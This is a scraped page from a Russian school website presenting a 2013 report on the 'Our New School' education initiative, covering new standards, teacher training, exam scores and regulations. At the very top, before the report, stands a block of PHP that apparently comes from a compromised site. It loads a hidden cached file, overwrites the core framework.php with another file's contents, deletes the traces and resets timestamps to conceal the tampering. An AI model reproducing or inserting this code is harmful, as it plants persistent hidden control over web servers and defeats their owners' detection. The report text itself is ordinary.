$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Доклад по проекту "Наша шовая школа" за 2013 год

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210444

На сайте

Сейчас 69 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Доклад по проекту "Наша шовая школа" за 2013 год

ДОКЛАД

«О результатах реализации национальной образовательной инициативы

«Наша новая школа» за 2013 год в МБОУ «Сагарчинская СОШ»

(весь текст доклада можно прочитать, скачать здесь)

Во исполнение поручения Президента Российской Федерации Д.А. Медведева от 03 февраля 2010 №Пр-259 МБОУ «Сагарчинская средняя общеобразовательная школа» в 2013 году продолжила работу по реализации мероприятий национальной образовательной инициативы «Наша новая школа», утвержденной Президентом РФ от 4 февраля 2010 г. № Пр-271:

· Переход на новые образовательные стандарты;

· Развитие системы поддержки талантливых детей;

· Совершенствование учительского корпуса;

· Изменение школьной инфраструктуры;

· Сохранение и укрепление здоровья школьников;

· Расширение самостоятельности школ.

 

Вышеперечисленные направления нашли отражение в деятельности МБОУ «Сагарчинская средняя общеобразовательная школа».

Часть I. ПЕРЕХОД НА НОВЫЕ ОБРАЗОВАТЕЛЬНЫЕ СТАНДАРТЫ

1.Информация о выполнении плана первоочередных действий по реализации национальной образовательной инициативы «Наша новая школа» в 2013 году.

Поэтапное введение федеральных государственных образовательных стандартов общего образования. Важнейшим вектором становления современной начальной школы является переход на новые образовательные стандарты. Этот переход следует рассматривать как средство обновления ресурсов школы - учреждения, ориентированного на результаты обучения, где развитие личности первоклассника на основе усвоения универсальных учебных действий (УУД) составляет цель и основной результат образования.

В 2011-2012 учебном году федеральный государственный образовательный стандарт начального общего образования второго поколения (далее – ФГОС НОО) реализуется в штатном режиме. С 1 сентября 2012-2013 образование нового качества получают 16 первоклассников, 17 второклассников МОБУ «Сагарчинская средняя общеобразовательная школа».

Для успешного внедрения стандартов проанализирована научно-методическая основа ФГОС НОО, обобщен материал по имеющимся практическим материалам. Школа обладает определенными ресурсами и педагогический коллектив стремятся создать в учреждении условия, необходимые для организации деятельности в новом режиме:

1.Создано свободное информационное поле по вопросам введения новых стандартов для всех участников системы образования,  День открытых дверей в школе).

В соответствии с федеральным перечнем учебников, рекомендованных Министерством образования и науки Российской Федерации к использованию в образовательном процессе учреждений, к началу 2012-2013 учебного года был сформирован заказ на учебники для учащихся 1- 4 классов. За счет средств регионального бюджета 1-4  класс школы на 100% обеспечены учебной литературой по основным предметам программы «Гармония».

2. Организация внеурочной деятельности за счет ресурсов общеобразовательного учреждения и учреждения дополнительного образования детей ;

3. Разрабатывались контрольно-измерительные материалы для мониторинга и оценки образовательных результатов, заявленных в ФГОС НОО.

4. Кроме того, в течение 2013 года продолжена целенаправленная работа по формированию кадрового ресурса в условиях введения новых стандартов.

В течение 2011-2013 учебного года повысили свою квалификацию на базе Института повышения квалификации и профессиональной переподготовки работников образования ГОУ ВПО «Оренбургский государственный педагогический университет» 3 учителя по следующей  дополнительной  профессиональной образовательной  программаме:

«Содержание и условия реализации ФГОС начального общего образования второго поколения»,

Педагоги школы приняли участие в районных семинарах по обмену опытом среди учителей начальных классов на начальном этапе введения ФГОС НОО по теме «Организация деятельности ОУ по проектированию и моделированию образовательного пространства начального образования в рамках внедрения ФГОС второго поколения». В семинарах приняли участие 50% педагогов, посетивших уроки в 1-х классах и 2-х классах и мастер - классы. В период проведения семинаров была организована работа круглых столов, по анализу следующих проблем: урок нового типа (содержание и технологии проектирования); моделирование образовательного пространства школы по введению ФГОС начальной ступени образования; методические аспекты введения стандартов второго поколения.

Создание современных условий – самая затратная часть школьных бюджетов при введении стандартов.

Развитие общероссийской системы качества общего образования.

 

Одним из приоритетных направлений деятельности в ходе реализации федерального государственного образовательного стандарта является создание системы оценки качества образования.

Муниципальная система оценки качества образования призвана обеспечить координацию деятельности имеющихся в муниципальных образовательных учреждениях систем оценки качества образования. Эта координация осуществляется посредством:

профессиональной экспертизы качества образования, организуемой профессиональным образовательным сообществом; организационных структур системы управления образованием, выполняющих функции по организации, проведению оценочных процедур, аналитической обработке и предъявлению информации потребителям;

Муниципальная система оценки качества образования – это целостная система диагностических и оценочных процедур, совокупность организационных структур и нормативно-правовых материалов, обеспечивающих управление качеством образования.

Предусматриваются два уровня организации оценивания: уровень образовательного учреждения и муниципальный уровень.

Объектами системы оценки качества образования являются:

  • учебные и внеучебные достижения учеников;
  • деятельность педагогов;
  • образовательная программа;
  • деятельность школы.

Реализация муниципальной системы оценки качества образования осуществляется посредством следующих процедур контроля и оценки качества образования:

  • государственной (итоговой) аттестации выпускников;
  • мониторинга образовательных достижений обучающихся на разных ступенях обучения;
  • аттестации педагогических и руководящих кадров;

Школьная система оценки качества образования формируются на основе мониторинга и мониторинговых исследований.

Информация о количестве участников ГИА -2012

 

Показатель

Наименование общеобразовательного предмета

 

Русский язык

Математика

Количество ОУ, участвующих в аттестации

10

10

 

Основные результаты государственной (итоговой) аттестации обучающихся, освоивших образовательные программы основного общего образования, с участием ТЭК представлены в следующей таблице:

Наименование предмета

2011-2012

2012-2013

Успев. (%)

На «4» и «5» (%)

Успев. (%)

На «4» и «5» (%)

Русский язык

100

91

100

80

Математика

100

39

100

80

 

Анализ данных показывает следующее:

- все выпускники, сдававшие экзамены в новой форме в 2013г., успешно справились с экзаменационными заданиями, что говорит о более качественной подготовке выпускников к итоговой аттестации по сравнению с предыдущими годами;

- 80% участников экзаменов справились с работой на «4» и «5»;

В 2013 году 6 выпускников школы стали участниками единого государственного экзамена.

Доля выпускников , сдавших ЕГЭ только по двум обязательным предметам, составила 16 %, по трём учебным предметам – 84 %.

Наиболее востребованным и массовым предметом для сдачи ЕГЭ стало обществознание.

Предмет

Кол-во выпускников школы, сдававших ЕГЭ

(% от общего числа выпускников, допущенных к итоговой аттестации)

2013 г.

русский язык

100

математика

100

обществознание

84

Деятельность школы в рамках единого государственного экзамена проводилась по таким направлениям, как:

  • формирование базы выпускников – участников ЕГЭ и ГИА;
  • организация и проведение ГИА;
  • организация и проведение государственного выпускного экзамена для учащихся 9 классов с ограниченными возможностями в здоровье;
  • организация общественного наблюдения за ходом ГИА;
  • организация доставки материалов ГИА в пункты проведения;
  • организация информационной безопасности при получении, хранении и использовании экзаменационных материалов.

В 2013 году 100 % выпускников школы успешно сдали обязательные экзамены.

Сравнительный анализ средних баллов, полученных выпускниками школы, показывает, что по всем  предметам  средний балл ниже областных показателей, по предмету «Русский язык»  средний балл выше районного среднего балла по району.

Средние баллы по предметам, сданными выпускниками школы:

 

Предмет

Год участия

Средний балл

по региону

по муниципалитету

по школе

Математика

2013

50

43,3

34,6

Русский язык

2013

67,4

62,6

67,3

Обществознание

2013

68,1

63,6

51,5

 

Большое внимание уделено использованию таких форм подготовки выпускников к успешной сдаче экзаменов в форме и по материалам ЕГЭ, как:

  • входной и промежуточный мониторинг качества знаний выпускников района;
  • участие в диагностических работах по математике, проводимых ФИПИ;
  • проведение районных контрольных срезов по итогам первого полугодия по русскому языку, математике, обществознанию.
  • проведение пробных ЕГЭ по русскому языку и математике, в которых приняли участие 100% выпускников школы, в рамках чего были отработаны основные технологические моменты проведения экзаменов.

По итогам проведённых экзаменов учащиеся получили возможность объективно оценить свои знания. Учителями изучены типичные ошибки, допущенные учащимися на экзаменах.

В школе было организовано ознакомление участников образовательного процесса с нормативными правовыми и инструктивно-методическими документами по проведению ЕГЭ.

Следует более тщательно информировать учащихся об экзаменах, начиная с десятого класса, чтобы к одиннадцатому,  ученики не спеша , сделали осознанный выбор. Отсюда необходимость повышения уровня профориентационной работы в школе.

Общественная оценка качества образования

«Новая школа - это современная система оценки качества образования, которая должна обеспечивать достоверной информацией о том, как работают и отдельные образовательные учреждения, и система образования в целом»,- подчеркнуто «Национальной в образовательной инициативе «Наша новая школа». Взаимодействие школы и родителей во всем многообразии составляет самую основу, на которой строится здание образования. Особое внимание школа уделяет расширению общественного участия в управлении образованием.

Родители являются реальными заказчиками образования, и именно их отношение к школе и к процессам, в ней происходящим, являются критерием успешности работы школы, соответственно успешности или не успешности процессов реформирования образования. Перед школой стоит вполне конкретная задача - обеспечить соответствие качества предоставляемых услуг как государственным нормам и стандартам, так и запросам потребителя. Выполнение этой задачи становится для образовательного учреждения жизненно важным условием. И все чаще в контексте проблемы качества работы образовательного учреждения употребляется такое понятие, как «конкурентоспособность». Оно означает качество работы школы, выделяющее ее из среды других учреждений и делающее ее инвестиционно привлекательной для потребителей образовательных услуг.

Формирование общественной оценки – дело непростое. Оно требует не только больших временных и трудовых затрат, но и умения не прятаться от проблем, не закрывать на них глаза, быть честными перед собой. Следует понимать, что недостатки - дело поправимое, а устранение их во многом зависит от точного выявления причин, составления реального плана действий и тесного сотрудничества родительской общественности и педагогического коллектива образовательного учреждения.

Нормативная база, обеспечивающая реализацию направления

 

  • Конституция Российской Федерации (1993 г).
  • ФЗ «Об образовании» Российской Федерации (2012 г.).
  • ФЗ от 01.12.2007 № 309-ФЗ «О внесении изменений в отдельные законодательные акты в части изменения понятия и структуры государственного образовательного стандарта».
  • Постановление Правительства от 24.02.2009 г. № 142 « Об утверждении Правил разработки и утверждения ФГОС».
  • Постановление Правительства РФ от 16.03.2011 г. № 174 «Об утверждении Положения о лицензировании образовательной деятельности»Приказ МО и РФ от 06. 10.2009 г. № 373 «Об утверждении и введении в действие федерального государственного образовательного стандарта начального общего образования».
  • Приказ МО и РФ от 26.11.2010 г. № 1241 «О внесении изменений в федеральный государственный образовательный стандарт начального общего образования, утвержденный приказом Министерства образования и науки РФ от 6 октября 2009 г. № 373».
  • Приказ МО и РФ от 04. 10.2010 № 986 «Об утверждении федеральных требований к образовательным учреждениям в части минимальной оснащенности учебного процесса и оборудования учебных помещений».
  • Приказ министерства образования Оренбургской области от 23.06.2011 г. № 01/20-863 «О внесении изменений в базисный учебный план в связи с введением третьего часа физической культуры».
  • Рекомендации министерства образования Оренбургской области от 20.09.2010 г. № 01/15-4324 «Об организации внеурочной деятельности в рамках реализации ФГОС начального общего образования в Оренбургской области

текст доклада полностью далее ...